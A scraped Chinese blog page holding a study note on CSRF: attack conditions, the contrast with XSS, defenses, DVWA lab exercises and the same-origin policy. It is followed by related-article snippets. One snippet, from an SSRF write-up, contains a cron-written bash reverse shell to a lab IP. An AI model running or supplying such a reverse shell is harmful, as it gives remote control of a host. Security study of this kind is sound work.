年糕SDS

DAY21：CSRF

 
  一、什么是CSRF 
 

 
CSRF（XSRF）定义 
 

 
CSRF原理介绍 
 

 
CSRF攻击的两个条件 
 

 
  ①登录受信任网站A，并在本地生成cookie 
 

 
  ②在不登出网站A的情况下，访问危险网站B 
 

 
CSRF与XSS的区别 
 

 
  csrf不要求网站有其他漏洞，使用起来更方便，但此漏洞有很大缺陷，需要知道向哪个页面提交请求，请求参数是什么样的，一般用在对网站很了解或在代码审计后挖到了CSRF漏洞后 
 

 
CSRF防御手段 
 

 
  （1）验证token值。 
 

 
  （2）验证HTTP头的Referer。 
 

 
  （3）用XMLHttpRequest附加在header里。 
 

 
  二、CSRF简单利用 
 

 
CSRF提交GET请求（DVWA实验） 
 

 
CSRF提交POST请求 
 

 
AJAX，同源策略 跨域请求（了解概念） 
 

 
  利用 AJAX 来执行 CSRF 漏洞失败（在 CSRF 里就不要用ajax）： 
 

 
CSRF与XSS结合（DVWA实验） 
 

 
  利用存储型xss漏洞写入CSRF攻击语句到数据库，每当管理员查看存储数据时都会执行CSRF攻击语句 
 

 
了解同源策略和跨域请求 
 

 
  https://www.cnblogs.com/rockmadman/p/6836834.html 
 

 
  ①先来说说什么是源 
 

 
  • 源（origin）就是协议、域名和端口号。 
 

 
  以上url中的源就是：http://www.company.com:80 
 

 
  若地址里面的协议、域名和端口号均相同则属于同源。 
 

 
  以下是相对于 http://www.a.com/test/index.html 的同源检测 
 

 
  • http://www.a.com/dir/page.html ----成功 
 

 
  • http://www.child.a.com/test/index.html ----失败，域名不同 
 

 
  • https://www.a.com/test/index.html ----失败，协议不同 
 

 
  • http://www.a.com:8080/test/index.html ----失败，端口号不同 
 

 
  ②什么是同源策略？ 
 

 
  同源策略是浏览器的一个安全功能，不同源的客户端脚本在没有明确授权的情况下，不能读写对方资源。所以a.com下的js脚本采用ajax读取b.com里面的文件数据是会报错的。 
 

 
  • 不受同源策略限制的： 
 

 
  （1）页面中的链接，重定向以及表单提交是不会受到同源策略限制的。 
 

 
  （2）跨域资源的引入是可以的。但是js不能读写加载的内容。如嵌入到页面中的，，，等。</span> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1184561182208532480"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(DAY21：CSRF)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1835258288011309056.htm"
                           title="王琳能量感恩日记Day21" target="_blank">王琳能量感恩日记Day21</a>
                        <span class="text-muted">王琳linda</span>

                        <div>感恩自己坚持了21天写感恩日记，她带来的能量真的是无法言喻的。感恩一个神仙女子的出现，让我链接了好多美好的事务和美好的人儿。是谁，你猜？感恩我老师遇事直言不讳的话术让我处理问题多了一层理性和智慧感恩琦哥能够为我们考虑一切，细心的尽所能想到他能做的所有感恩宝宝健康快乐成长和给我带来的温暖感恩娜娜的信任让我们双向奔赴遇见更好的自己和迎接全新的未来感恩米雪的热情活泼，传递对工作的热情把我彻底感染了感恩钱</div>
                    </li>
                    <li><a href="/article/1834753876109127680.htm"
                           title="2021.6.5兴艳咖啡冥想记录 DAY21" target="_blank">2021.6.5兴艳咖啡冥想记录 DAY21</a>
                        <span class="text-muted">小小吴兴艳</span>

                        <div>接近尾声啦，现在，让我怀着愉悦而放松的心情为我的好种子浇水，施肥咖啡冥想内容如下：1.帮室友带早餐2.运动健身3.捐赠步数4.普拉提课没有凑够人数，满老师个小愿感恩感谢今天晚上普拉提老师带我们练动作感谢露露姐跟我运动方面的建议感谢丁宁老师用心地给我们授课，分析生活中的案例感谢演讲班在周末的时间一起学习一起成长感谢俊姐的用心主持感谢燃脂群和读书会群里的分享感恩今天的一切感受:超级感恩那些给我机会种好</div>
                    </li>
                    <li><a href="/article/1833514971900768256.htm"
                           title="Java Web安全与Spring Config对象实战" target="_blank">Java Web安全与Spring Config对象实战</a>
                        <span class="text-muted">福建低调</span>

                        <div>本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全</div>
                    </li>
                    <li><a href="/article/1833466437298122752.htm"
                           title="Web安全之CSRF攻击详解与防护" target="_blank">Web安全之CSRF攻击详解与防护</a>
                        <span class="text-muted">J老熊</span>
<a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/Web%E5%AE%89%E5%85%A8/1.htm">Web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a>
                        <div>在互联网应用中，安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造（Cross-SiteRequestForgery,CSRF），是一种常见的Web安全漏洞。通过CSRF攻击，黑客可以冒用受害者的身份，发送恶意请求，执行诸如转账、订单提交等操作，导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法，结合电商交易系统的场景给出错误和正确的示范代码，并分析常见的安全问题与解决方案，</div>
                    </li>
                    <li><a href="/article/1832218172359536640.htm"
                           title="Day21—爬虫性能优化技巧" target="_blank">Day21—爬虫性能优化技巧</a>
                        <span class="text-muted">Ztop</span>
<a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB%EF%BC%88%E6%96%B0%E6%89%8B%E6%8E%A8%E8%8D%90%EF%BC%89/1.htm">爬虫（新手推荐）</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E6%80%A7%E8%83%BD%E4%BC%98%E5%8C%96/1.htm">性能优化</a>
                        <div>在网络爬虫的开发过程中，性能优化是一个关键环节。一个高效的爬虫不仅能够快速完成任务，还能减轻对目标网站的压力，降低被封禁的风险。本文将讨论如何优化爬虫性能，包括请求头优化、连接池、缓存策略等技巧。1.请求头优化请求头是HTTP请求的重要组成部分，它包含了客户端向服务器发送的元数据。通过优化请求头，可以模拟正常用户的行为，减少被网站识别为爬虫的可能性。User-Agent：设置合适的User-Age</div>
                    </li>
                    <li><a href="/article/1832045487147020288.htm"
                           title="亚马逊/关键字搜索排名爬虫" target="_blank">亚马逊/关键字搜索排名爬虫</a>
                        <span class="text-muted">香橼数据</span>
<a class="tag" taget="_blank" href="/search/%23%E7%94%B5%E5%95%86%E5%B9%B3%E5%8F%B0%E7%88%AC%E8%99%AB/1.htm">#电商平台爬虫</a><a class="tag" taget="_blank" href="/search/%23%E7%94%B5%E5%95%86%E5%B9%B3%E5%8F%B0-%E4%BA%9A%E9%A9%AC%E9%80%8A/1.htm">#电商平台-亚马逊</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/selenium/1.htm">selenium</a>
                        <div>目录1.需求&背景&挑战2.抓包分析2.1从首页获取session等信息2.2获取ubid_acbde信息2.3获取session-token信息2.4获取csrf-token信息2.5调用更改地址的接口3.验证码处理亚马逊作为全球最大的跨境电商平台，其数据的价值不言而喻。常规的使用场景有1)关键字搜索+广告抢位；2）ASIN详情；3）评论分析。作为完善的电商平台，其反爬的策略复杂多变，尤其是假数</div>
                    </li>
                    <li><a href="/article/1831844942079684608.htm"
                           title="Day21/11 艾宏21天职场方法论学习打卡" target="_blank">Day21/11 艾宏21天职场方法论学习打卡</a>
                        <span class="text-muted">阳光美少女_黄彦蓉</span>

                        <div>【今日小作业】主题格式：Day11_黄彦蓉【心态管理—真正的努力】1、如果为你的努力打分，你能给自己打多少分（满分10分）？为什么？艾宏组长说过：真正的努力=全力以赴+目标明确+坚持不懈如果为自已的努力打分，应该要分几个维度：工作上可以达到9分，生活上应该只有5分，学习上应该达到6分。我估算了一下：我有80%的时间和精力是投入工作的，工作在我心里永远是第一位的。对待工作，我是全力以赴的。我属于天资</div>
                    </li>
                    <li><a href="/article/1831556480071987200.htm"
                           title="pdf.js支持base64 pdf文件异步加载做文件请求加密" target="_blank">pdf.js支持base64 pdf文件异步加载做文件请求加密</a>
                        <span class="text-muted">zh7314</span>
<a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/ecmascript/1.htm">ecmascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>2022年6月23日16:11:17默认是请求明文的pdf文件路径，但是因为是个人信息文件，有规律的文件格式，就有被拉去文件的问题，所以加密请求$.ajax({url:"{{URL::to('/getPdf')}}",dataType:"json",data:{code:"{{$code}}"},headers:{'X-CSRF-TOKEN':$('meta[name="csrf-token"]'</div>
                    </li>
                    <li><a href="/article/1830582727255093248.htm"
                           title="Flask知识点2" target="_blank">Flask知识点2</a>
                        <span class="text-muted">我的棉裤丢了</span>
<a class="tag" taget="_blank" href="/search/Flask/1.htm">Flask</a><a class="tag" taget="_blank" href="/search/flask/1.htm">flask</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>1、flash()get_flashed_messages():用来消耗flash方法中存储的消息使用flash存储消息时，需要设置SECRET_KEYflash内部消息存储依赖了session2、CSRF(CrossSiteRequestForgery)跨站请求伪造，指攻击者盗用你的身份发送恶意请求CSRFProtect解决CSRF安装扩展包flask-wtffromflask_wtf.csrf</div>
                    </li>
                    <li><a href="/article/1830280590809722880.htm"
                           title="DWVA手把手教程(三)——CSRF漏洞" target="_blank">DWVA手把手教程(三)——CSRF漏洞</a>
                        <span class="text-muted">RabbitMask</span>

                        <div>欢迎来到CSRF漏洞章节，在此，请允许作为#灵魂画师！！#的我图文并茂的为大家简单介绍一下CSRF漏洞：CSRF跨站点请求伪造(Cross—SiteRequestForgery)你可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转</div>
                    </li>
                    <li><a href="/article/1830247582459326464.htm"
                           title="Web攻击-XSS、CSRF、SQL注入" target="_blank">Web攻击-XSS、CSRF、SQL注入</a>
                        <span class="text-muted">rrrobber</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a>
                        <div>1.XSS攻击：跨站脚本攻击XSS（CrossSiteScripting），跨站脚本攻击，允许攻击者将恶意代码植入到提供给其它用户使用的页面中。XSS的攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息。一旦获取到合法用户的信息后，攻击者甚至可以假冒合法用户与网站进行交互。根据攻击来源被分为存储型、反射型、DOM型1.1.存储型存储型XSS的攻击步骤：攻击者将恶意</div>
                    </li>
                    <li><a href="/article/1830028748020346880.htm"
                           title="CSRF学习以及一些绕过referer的方法" target="_blank">CSRF学习以及一些绕过referer的方法</a>
                        <span class="text-muted">不想当脚本小子的脚本小子</span>
<a class="tag" taget="_blank" href="/search/CSRF/1.htm">CSRF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E5%8E%9F%E7%90%86/1.htm">安全原理</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>跨站请求伪造，原理：——两个关键点：跨站点的请求以及请求是伪造的攻击者盗用了用户的身份，以用户的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作1.用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；2.在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；3.用户未退出网站A之前，在</div>
                    </li>
                    <li><a href="/article/1829867180641054720.htm"
                           title="node节点状态为noready" target="_blank">node节点状态为noready</a>
                        <span class="text-muted">低调沉稳</span>
<a class="tag" taget="_blank" href="/search/openshift/1.htm">openshift</a>
                        <div>node节点状态为noready;systemctlstatusatomic-openshift-node.service，查看报“csrforthisnodealreadyexists,reusing;csrforthisnodeisstillvalid;atomic-openshift-node.servicestartoperationtimedout.Terminating”是由于证书没有</div>
                    </li>
                    <li><a href="/article/1829700526787358720.htm"
                           title="[【DevOps】调用 Jenkins 的 API 接口时出现 HTTP 403 错误" target="_blank">[【DevOps】调用 Jenkins 的 API 接口时出现 HTTP 403 错误</a>
                        <span class="text-muted">阿寻寻</span>
<a class="tag" taget="_blank" href="/search/devops/1.htm">devops</a><a class="tag" taget="_blank" href="/search/jenkins/1.htm">jenkins</a><a class="tag" taget="_blank" href="/search/http/1.htm">http</a>
                        <div>调用Jenkins的API接口时出现HTTP403错误1.**检查身份验证信息**a.**API令牌**b.**BasicAuth**2.**检查用户权限**a.**确保用户有足够的权限**3.**检查CSRF防护设置**a.**禁用CSRF**b.**提供CSRFToken**4.**网络配置和代理问题**a.**检查代理设置**5.**其他常见问题**总结当调用Jenkins的API接口时出现</div>
                    </li>
                    <li><a href="/article/1829391410390986752.htm"
                           title="html表单没的csrf保护,表单与csrf保护" target="_blank">html表单没的csrf保护,表单与csrf保护</a>
                        <span class="text-muted">翰遴院遴选</span>
<a class="tag" taget="_blank" href="/search/html%E8%A1%A8%E5%8D%95%E6%B2%A1%E7%9A%84csrf%E4%BF%9D%E6%8A%A4/1.htm">html表单没的csrf保护</a>
                        <div>##表单提交和CSRF在本课程中，我们将介绍将表单数据提交到服务器的基本工作流程。在此过程中，我们将介绍一个新概念：`CSRF`(跨站点请求伪造)。###新手建议前面几节我们介绍了如何从数据库中获取数据，使用`Tinker`添加测试数据。接下来我们在页面中实现添加数据并展示。>不论做任何复杂的功能，都是从简单开始，慢慢迭代，这里给新手一个建议，不论做什么都先按照`路由->控制器->视图`的顺序来开</div>
                    </li>
                    <li><a href="/article/1829388384213233664.htm"
                           title="Django 提供的 CSRF 防护机制" target="_blank">Django 提供的 CSRF 防护机制</a>
                        <span class="text-muted">hzp666</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/django/1.htm">django</a>
                        <div>用django有多久，我跟csrf这个概念打交道就有久了。每次初始化一个项目时都能看到django.middleware.csrf.CsrfViewMiddleware这个中间件每次在模板里写form时都知道要加一个{%csrf_token%}tag每次发ajaxPOST请求，都需要加一个X_CSRFTOKEN的header但是一直我都是知其然而不知其所以然，没有把csrf的机制弄清楚。昨天稍微研</div>
                    </li>
                    <li><a href="/article/1829387501480013824.htm"
                           title="CSRF攻击原理以及防御方法" target="_blank">CSRF攻击原理以及防御方法</a>
                        <span class="text-muted">BinBin_Bang</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>CSRF攻击原理以及防御方法CSRF概念：CSRF跨站点请求伪造(Cross—SiteRequestForgery)，跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。如下：其中WebA</div>
                    </li>
                    <li><a href="/article/1829384352094580736.htm"
                           title="CSRF 概念及防护机制" target="_blank">CSRF 概念及防护机制</a>
                        <span class="text-muted">Bryant5051</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>概述CSRF（Cross-SiteRequestForgery），即跨站请求伪造，是一种网络攻击方式。在这种攻击中，恶意用户诱导受害者在不知情的情况下执行某些操作，通常是利用受害者已经登录的身份，向受害者信任的网站发出恶意请求。原理分析从概述中划重点：利用受害者已经登陆的身份（如登陆态、浏览器中的Cookie等），向受害者已登陆的网站发出恶意请求。举例：假设用户A已经登陆到某银行网站bank.co</div>
                    </li>
                    <li><a href="/article/1828943518857523200.htm"
                           title="ssrf做题随记--任务计划的写入、csrf简单知识" target="_blank">ssrf做题随记--任务计划的写入、csrf简单知识</a>
                        <span class="text-muted">板栗妖怪</span>
<a class="tag" taget="_blank" href="/search/%E5%B0%8F%E8%AE%B0/1.htm">小记</a><a class="tag" taget="_blank" href="/search/%E9%9A%8F%E7%AC%94/1.htm">随笔</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>目录ssrfcsrfssrf这里忘记写文档了，然后再次搭建环境一直成功不了所以这里以文字的方式记录一些要注意的点。redis在低版本下没有降权然后执行的时候是以root权限执行，到了高版本以后就不行了redis被降权了,且如果是高版本稳定版的话是没有办法写入也就是更加安全*****/bin/bash-i>&/dev/tcp/192.168.0.106/77770>&1centos写入任务计划是很正</div>
                    </li>
                    <li><a href="/article/1828362496986148864.htm"
                           title="关于6种Web安全常见的攻防姿势" target="_blank">关于6种Web安全常见的攻防姿势</a>
                        <span class="text-muted">AI大模型-搬运工</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a>
                        <div>关于Web安全的问题，是一个老生常谈的问题，作为离用户最近的一层，我们大前端应该把手伸的更远一点。我们最常见的Web安全攻击有以下几种：XSS跨站脚本攻击CSRF跨站请求伪造URL跳转漏洞ClickJacking点击劫持/UI-覆盖攻击SQLInjectionSQL注入OSCommandInjectionOS命令注入一、XSSXSS（CrossSiteScript），中文是跨站脚本攻击；其原本缩写</div>
                    </li>
                    <li><a href="/article/1828304131115282432.htm"
                           title="21天自我突破计划21" target="_blank">21天自我突破计划21</a>
                        <span class="text-muted">Sophia040825</span>

                        <div>图片发自App#21天自我突破#Day21,今天的课是最后一节，应该在昨天上完，但因为一些事耽搁，今天补上。自我发展：一条不断延伸的路。内观，也是一条伴随终身的路。接触到心理学以来，越来越了解自己，越来越与自己相处融洽，也越来越平静，21天课程只是开始，感谢老师的引领，还会继续前行。</div>
                    </li>
                    <li><a href="/article/1827794725520896000.htm"
                           title="前端安全XSS，CSRF" target="_blank">前端安全XSS，CSRF</a>
                        <span class="text-muted">前端-JC</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>XSS（Cross-sitescripting）跨站脚本攻击：用户在页面渲染数据时注入可运行的恶意脚本目的是盗用cookie，获取敏感信息，得到更高权限防御方法是对输入和输出进行严格过滤CSRF（Cross-siterequestforgery）跨站请求伪造：冒充受信认用户、向服务器发送非本意/非预期的请求认防御措施有cookit设置SameSite属性、验证请求请求头中Referer来源、表单请</div>
                    </li>
                    <li><a href="/article/1827283389351292928.htm"
                           title="CSRF 2022-05-21" target="_blank">CSRF 2022-05-21</a>
                        <span class="text-muted">9_SooHyun</span>

                        <div>跨站请求伪造（Cross-siterequestforgery），也被称为one-clickattack或者sessionriding，通常缩写为CSRF或者XSRF，是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。一次成功的CSRF攻击需要满足2个条件：1.冒用了前端用户的登陆态身份2.后台服务无条件信任请求浏览器默认携带本次http请求域名的cookie，这给了攻击者极</div>
                    </li>
                    <li><a href="/article/1827130222282108928.htm"
                           title="云计算day21" target="_blank">云计算day21</a>
                        <span class="text-muted">巭氼</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a>
                        <div>⼀、MySQL函数数据分析的基础1.排序1.max2.min2.汇总1.count2.sum3.avg3.数制1.⼆进制1.002.113.2104.3115.41006.2.⼋进制3.⼗进制常⽤聚合``函数统计表中数据的⾏数或者统计指定列不为空值的数据⾏个数selectcount(*或表头名)from表名；计算指定列的最⼤值，如果指定列是字符串类型(⽂字类型)则使⽤字符⾸拼排序selectmax</div>
                    </li>
                    <li><a href="/article/1826883277261205504.htm"
                           title="DVWA靶场通关（CSRF）" target="_blank">DVWA靶场通关（CSRF）</a>
                        <span class="text-muted">马船长</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>CSRF是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。漏洞利用前提：:用户必须登录、黑客懂得一些发包的请求,服务器端是不会有二次认证的，被害者是不知情的</div>
                    </li>
                    <li><a href="/article/1772227608906366976.htm"
                           title="《论语》学习感悟" target="_blank">《论语》学习感悟</a>
                        <span class="text-muted">博学小确幸</span>

                        <div>Day21学习感悟14.6：子曰：“君子而不仁者有矣夫，未有小人而仁者也。”译文孔子说：“君子之中也许有不仁的人吧，但小人之中却不会有仁人。14.7：子曰：“爱之，能勿劳乎？忠焉，能勿诲乎？”译文孔子说：“爱他，能不以勤劳相劝勉吗？忠于他，能不以善言来教诲他吗？”14.8：子曰：“为命，裨（bi四）谌（chen二）草创之，世叔讨论之，行人子羽修饰之，东里子产润色之。”译文孔子说：“郑国制订外交文件</div>
                    </li>
                    <li><a href="/article/1770377523083935744.htm"
                           title="闵月的感恩日记Day21" target="_blank">闵月的感恩日记Day21</a>
                        <span class="text-muted">邓闵月</span>

                        <div>美好的一天，以感恩结束。【今日金句】达成目标最有价值的事，不是你获得了你想要的东西，而是你努力获得想要东西后，你成为了什么样的人。-------吉姆·罗恩1、感恩今天我的合伙人安娜，在她身上，我看到了，她有坚定的信念:即使现在不足够优秀，可是她相信只要持续不断学习成长，也会变成牛人。就像我今天一早上就发出一条信息:相信是万能的钥匙，你相信你能够行，你就一定能行。2、感恩我们此次七天训练营不断付出的</div>
                    </li>
                    <li><a href="/article/1765991752549883904.htm"
                           title="Django高级之-forms组件" target="_blank">Django高级之-forms组件</a>
                        <span class="text-muted">Renweif</span>
<a class="tag" taget="_blank" href="/search/Django/1.htm">Django</a><a class="tag" taget="_blank" href="/search/django/1.htm">django</a>
                        <div>Django高级之-forms组件1校验字段功能针对一个实例：注册用户讲解。模型：models.pyclassUserInfo(models.Model):name=models.CharField(max_length=32)pwd=models.CharField(max_length=32)email=models.EmailField()模版文件Title{%csrf_token%}用户名</div>
                    </li>
                    <li><a href="/article/1762658211246202880.htm"
                           title="字节面试分享，请详细介绍为何Http Post发送两次请求" target="_blank">字节面试分享，请详细介绍为何Http Post发送两次请求</a>
                        <span class="text-muted">zy_zeros</span>
<a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/http/1.htm">http</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a>
                        <div>在浏览器中，内容是很开放的，任何资源都可以接入其中，如JavaScript文件、图片、音频、视频等资源，甚至可以下载其他站点的可执行文件。但也不是说浏览器就是完全自由的，如果不加以控制，就会出现一些不可控的局面，例如会出现一些安全问题，如：跨站脚本攻击（XSS）SQL注入攻击OS命令注入攻击HTTP首部注入攻击跨站点请求伪造（CSRF）等等…如果这些都没有限制的话，对于我们用户而言，是相对危险的，</div>
                    </li>
                    <li><a href="/article/1760815085430820864.htm"
                           title="代码随想录算法训练营day21|530.二叉搜索树的最小绝对差 、501.二叉搜索树中的众数、236. 二叉树的最近公共祖先" target="_blank">代码随想录算法训练营day21|530.二叉搜索树的最小绝对差 、501.二叉搜索树中的众数、236. 二叉树的最近公共祖先</a>
                        <span class="text-muted">一只马儿️</span>
<a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a>
                        <div>530.二叉搜索树的最小绝对差代码随想录视频讲解：二叉搜索树中，需要掌握如何双指针遍历！|LeetCode：530.二叉搜索树的最小绝对差_哔哩哔哩_bilibili把二叉搜索树转换成有序数组，然后遍历一遍数组，就统计出来最小差值了递归法（版本一）利用中序递增，结合数组#Definitionforabinarytreenode.#classTreeNode:#def__init__(self,va</div>
                    </li>
                                <li><a href="/article/23.htm"
                                       title="HttpClient 4.3与4.3版本以下版本比较" target="_blank">HttpClient 4.3与4.3版本以下版本比较</a>
                                    <span class="text-muted">spjich</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/httpclient/1.htm">httpclient</a>
                                    <div>网上利用java发送http请求的代码很多，一搜一大把，有的利用的是java.net.*下的HttpURLConnection，有的用httpclient，而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 
httpclient又可分为 
 
 httpclient3.x 
 httpclient4.x到httpclient4.3以下 
 httpclient4.3</div>
                                </li>
                                <li><a href="/article/150.htm"
                                       title="Essential Studio Enterprise Edition 2015 v1新功能体验" target="_blank">Essential Studio Enterprise Edition 2015 v1新功能体验</a>
                                    <span class="text-muted">Axiba</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a>
                                    <div>概述：Essential Studio已全线升级至2015 v1版本了！新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件，还有其他一些控件功能升级，精彩不容错过，让我们一起来看看吧！ 
syncfusion公司是世界领先的Windows开发组件提供商，该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本</div>
                                </li>
                                <li><a href="/article/277.htm"
                                       title="[宇宙与天文]微波背景辐射值与地球温度" target="_blank">[宇宙与天文]微波背景辐射值与地球温度</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E8%83%8C%E6%99%AF/1.htm">背景</a>
                                    <div> 
 
 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢? 
 
&nbsp;&nbsp;&nbsp;&nbsp; 如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢? 
 
 
&nbsp;&nbsp;&nbs</div>
                                </li>
                                <li><a href="/article/404.htm"
                                       title="lvs-server" target="_blank">lvs-server</a>
                                    <span class="text-muted">男人50</span>
<a class="tag" taget="_blank" href="/search/server/1.htm">server</a>
                                    <div>#!/bin/bash 
# 
# LVS script for VS/DR 
# 
#./etc/rc.d/init.d/functions 
# 
VIP=10.10.6.252 
RIP1=10.10.6.101 
RIP2=10.10.6.13 
PORT=80 
case $1 in 
start) 
 
&nbsp; /sbin/ifconfig eth2:0 $VIP broadca</div>
                                </li>
                                <li><a href="/article/531.htm"
                                       title="java的WebCollector爬虫框架" target="_blank">java的WebCollector爬虫框架</a>
                                    <span class="text-muted">oloz</span>
